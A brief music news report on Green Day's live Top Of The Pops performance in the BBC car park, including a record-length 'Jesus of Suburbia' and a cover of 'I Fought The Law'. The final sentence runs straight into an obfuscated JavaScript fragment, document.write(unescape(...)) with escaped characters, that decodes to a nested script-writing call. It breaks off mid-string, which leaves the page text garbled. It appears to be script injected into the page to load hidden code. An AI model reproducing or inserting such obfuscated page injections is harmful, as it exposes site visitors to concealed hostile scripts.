Green Day pulled out all the stops yesterday with a special Top Of The Pops live performance in the BBC car park on a specially erected stage.
Approximately 150 fans, including Music News, witnessed what will enter the BBC record books as the longest ever recorded song in the shows history. Clocking in at over a staggering 9 minutes 'Jesus of Suburbia' kept the lucky few fans enthralled with added pyrotechnics. Once the live link was over Green Day continued to play hits from their recent smash hit album ‘American Idiot' as well as classics such as 'Minority' and ‘Welcome To Paradise'. They closed the show with a classic version of the cover made famous by The Clash ‘I Fought The Law'.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
